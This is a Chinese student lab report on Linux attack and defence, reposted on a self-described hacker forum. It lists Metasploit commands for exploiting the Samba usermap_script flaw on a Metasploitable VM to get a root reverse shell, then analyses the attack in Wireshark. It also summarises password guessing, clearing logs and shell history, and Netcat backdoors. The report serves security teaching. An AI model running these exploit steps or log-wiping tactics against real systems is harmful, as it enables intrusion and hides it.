• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

20212818 2021-2022-2 《网络攻防实践》实践报告7


Recommended Posts

一、实践内容

1、Linux系统结构

(1)Linux操作系统:一个完整的基于Linux内核的操作系统就是Linux操作系统。

(2)Linux操作系统的结构包括Linux内核、部分GNU运行时和工具、命令行Shell、图形界面X-window系统和相应的桌面环境,并包含从office软件包、编译器、文本编辑器、科学工具到网络服务等数以千计的应用程序。

(3)Linux进程和线程管理机制

Linux内核采用抢占式多用户多进程模式,多个进程并发活动。内核的进程管理模块负责调度硬件资源的使用。作为最基本的调度单元,维护一个进程控制块结构,利用内核的schedule进程调度函数,根据进程优先级和CPU资源来执行。

(4)Linux的内存管理机制

Linux的内存管理支持虚拟内存。在32位i386机器上,每个进程都有一个独立的4GB虚拟内存空间。内核的代码和数据段被映射到3GB以上,而用户模式代码申请的虚拟内存空间在0-3GB的范围内。每个进程使用两组段描述符分别访问内核态和用户态内存空间。在用户模式下,代码不能访问超过3GB的地址空间。如果您想访问内核空间,您必须调用系统或

内存管理模块为进程提供内存分配、内存回收、分页请求和分页交换等系统调用服务。

mmgjkfvegtq3741.png

(5)Linux文件系统管理机制

Linux内核使用虚拟文件管理VFS机制,可以支持几十种不同类型的逻辑文件系统,并通过设备驱动程序访问特定的硬件设备。

VFS虚拟文件管理为用户进程提供了一套通用的文件系统调用函数,可以统一操作不同文件系统中的文件。

(6)Linux的设备控制机制

在Linux内核中处理或管理硬件控制器的软件是设备驱动程序.

Linux核心设备驱动程序的本质是一个带有特权内存的低级硬件控制例程的共享库。

Linux的基本特点:它抽象了设备的处理,所有的硬件设备都像普通文件一样对待。

Linux支持三种类型的硬件设备:字符设备、块设备和网络设备。

字符:直接读/写,无缓冲

(7)Linux的网络机制

Linux内核中的网络模块提供了对各种网络标准的访问和对各种网络硬件的支持。网络接口分为网络协议栈和网络驱动。

(8)Linux系统调用机制

Linux的系统调用接口允许应用程序通过该接口访问硬件设备和其他系统资源,有助于保证系统的稳定性、可靠性和安全性,并为用户提供了统一的抽象接口,有助于应用程序的跨平台移植。

3、Linux系统远程攻防技术

(1)Linux远程密码猜测攻击

使用Linux系统上的finger、rusers、sendmail等服务,列出目标系统上的用户帐户名,并猜测相关密码。

Linux系统上的HTTP/HTTPS、FTP等网络服务都有自己的用户账号体系和身份认证机制。通过猜测远程密码可以获得网络服务的访问权限,从而获得系统的本地访问权限。

Brutus,thchhydra,Cain和Abel是远程密码猜测工具中常用的。

防范远程密码猜测攻击的最佳方法是使用难以猜测的强密码。

(2)Linux网络服务远程渗透攻击

Linux内核中的网络协议栈攻击

LAMP网站中的网络服务攻击

/li>

电子邮件收发服务攻击

FTP、Samba等文件共享服务攻击

4、Linux系统本地安全攻防技术

(1)Linux系统上的消踪灭迹

  • 攻击者在攻陷Linux系统后,通常不希望给系统管理员留下自己的入侵记录,因而往往会去清理系统上的日志目录,从而有效地抹除掉自己的行动踪迹。

  • 攻击者还需要清理的是自己在shell程序中所输入的命令历史记录,shell是计算机用来解释你输入的命令然后决定进行何种处理的程序,Linux系统中的很多shell程序都记录运行过的历史命令,以提供检索和重复执行命令的功能。

(2)Linux系统远程控制后门程序

  • 特洛伊木马化的系统程序

  • 命令行后门工具:提供远程命令行shell的访问,通常是使用Netcat等后门工具在系统上运行,开放监听一个TCP端口,在接收到请求之后返回一个Linux系统shell与客户端进行交互。

  • 图形化后门工具:最为常用的是图形化远程控制免费软件VNC。

5、Linux操作系统安全机制

(1)Linux身份认证机制

  Linux是一个多用户多任务的操作系统,通过创建多种角色类型的用户和用户组来进行用户身份管理

  • 用户:执行进程完成特定操作任务的主体,包括Root根用户、普通用户和系统用户

  • 用户组:具有相同特征的用户账号集合。

  • 本地登录用户认证机制:对用户在控制台登录的认证过程

  • 远程登录用户认证机制:普遍使用SSH服务进行远程用户登录,有基于口令的身份认证和基于非对称密钥的身份认证

(2)Linux安全审计机制

  主要通过三个主要的日志子系统实现

  • 连接时间日志:系统管理员能跟踪谁在何时登录到系统

  • 进程统计日志:为系统中的基本服务提供命令使用统计

  • 错误日志记录:报告值得注意的事件

(3)Linux授权与访问控制机制

  虚拟文件系统安全模型中,主要通过文件所有者、文件访问权限和一些特殊权限位来进行系统授权和访问控制

  • 文件所有者:该文件属于哪个用户

  • 文件访问权限:通过附带的10个标志位进行设置

  • 文件的特殊执行权限:常见的SUID、SGID权限

二、实践过程

任务一:使用Metasploit进行Linux远程渗透攻击

  使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

  ①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

  ②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

  ③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

  ④设置渗透攻击参数(RHOST,LHOST,TARGET等);

  ⑤执行渗透攻击;

  ⑥查看是否正确得到远程Shell,并查看获得的权限。

  在kali中输入msfconsole进入Metasploit

3ipsiwaif2r3742.png

  输入指令search usermap来搜索渗透模块,结果如下图

 bgzi3avu32l3743.png

  输入use exploit/multi/samba/usermap_script使用渗透模块,输入指令show payloads来获取攻击负载模块列表,并选择攻击负载模块,reverse tcp是指反向TCP连接,反向TCP:在正常转发连接中,客户端是通过服务器的开放端口连接到服务器的,但在反向连接的情况下,客户端会主动打开服务器上的端口。反向连接最常见的用途就是绕过防火墙和路由器的安全限制。在计算机科学与电信领域,负载(英语:Payload)是数据传输中所欲传输的实际信息,通常也被称作实际数据或者数据体,通俗一点讲,在程序的世界里,payload(有效载荷)就是对于接收者有用的数据

 b5hd4ja3xix3744.png

  输入指令set PAYLOAD cmd/unix/reverse来设置有效的攻击载荷

 tcxkokovx2x3745.png

  输入ifconfig查看kali的IP地址为192.168.1.115,选择Metasploitable-ubuntu为靶机,并输入ipconfig查看其IP地址为192.168.1.113。

ebajve5jdfa3746.png

 

 

 

uxuchb2dr113747.png

 

 

 

   输入指令set lhost 192.168.1.115设置攻击机地址,set rhost 192.168.1.113设置靶机地址。

xemqp0hkubw3748.png

  输入指令show options看信息设置是否正确

lbnvv5df3al3749.png

   输入run进行攻击

3svzhwe2tm23750.png

 

 

   输入ifconfig查看靶机IP,与真实IP一致,验证了本次渗透攻击已经成功。

z42mbng5kku3751.png

 

 

   执行whoami查看获得权限为root。s1ntwrrajbv3752.png

 

 

 

任务二:实践作业:攻防对抗实践

  • 攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

  • 防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

 

  实践二与实践一步骤相似,也是先进入Metasploit

bpqbuci54xq3753.png

 

 

 3wlujta5fym3754.png

 

 

   选择攻击负载模块、设置攻击机/靶机地址,并进行攻击。其中kali的IP地址是192.168.1.115,同学的靶机IP地址为192.168.1.102。

asai0hlwfex3755.png

  在run之前启动wireshark抓包,然后启动攻击,可以看到首先攻击机向靶机发送一个SMB的Negotiate Protocol Request(协商协议请求)数据报,服务器响应一个SMB的Negotiate Protocol Response(协商协议响应)数据报

ucphaug2rni3756.png

 

 

  然后攻击机向靶机发起一个Session setup X request(会话设置请求)数据。

dp11yndcp0m3757.png

 

 

   靶机确认身份后发送一个Session Setup X Response(会话设置响应)数据报同意本次连接。

1llwonhicpp3758.png

 

 

   查看攻击发起时间,时间是2020年4月2日晚上10点59分58秒。

oqn0cm4qlus3759.png

 

 

 

由下图可知源端口41185、目的端口4444、源地址192.168.1.102、目的地址192.168.1.115,

flb3ra3nrqr3760.png

  通过命令shell查看shell权限账户。

pal31gtcu5w3761.png

 

   通过id查看其所在的权限组,通过命令whomai查看当前权限账户,可以看到权限为root。uk3mm1ac3gu3762.png

 

   回到wireshark,找到TCP协议密集的地方,追踪TCP流可以看见之前我们输入的命令

khe2tnjdzkc3763.png

  还可以看到shellcode,将里面的数据输入base64却依旧不可得明码。

zo2vnpvmfif3764.png

三、学习中遇到的问题及解决

问题:在任务一中用kali攻击靶机时,提示靶机没有相应,因此无法攻击成功。

解决:将虚拟机kali和靶机模式都改为桥接模式之后,发现kali和靶机不在同一网段,因此攻击不成功。直接ping www.baidu.com发现也无法ping通,使用命令sudo dhclient eth0更新IP地址后,kali和靶机终于在同一网段,然后可以正常攻击。

四、实践总结

  本来同学都说这次的作业很简单所以自己也放松了警惕,以为会很快完成。但是没想到自己做的时候出现的问题很奇怪,同样的攻击(自己的kali攻击自己的靶机)在实践六都可以成功,但是在实践七时却攻击不了,这实在是让我太迷惑了,所幸后面改成桥接模式之后再进行各种操作kali攻击靶机成功。这让我意识到,做事情不能心浮气躁,啥事儿都可能发生,要沉住气,耐心地一步一步完成任务。

  这次实验使我对虚拟机的攻击操作更加熟练,更是提高了我解决问题的能力,对网络攻防的相关知识掌握得也更多,相信我在后续的实验中会越做越好。

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now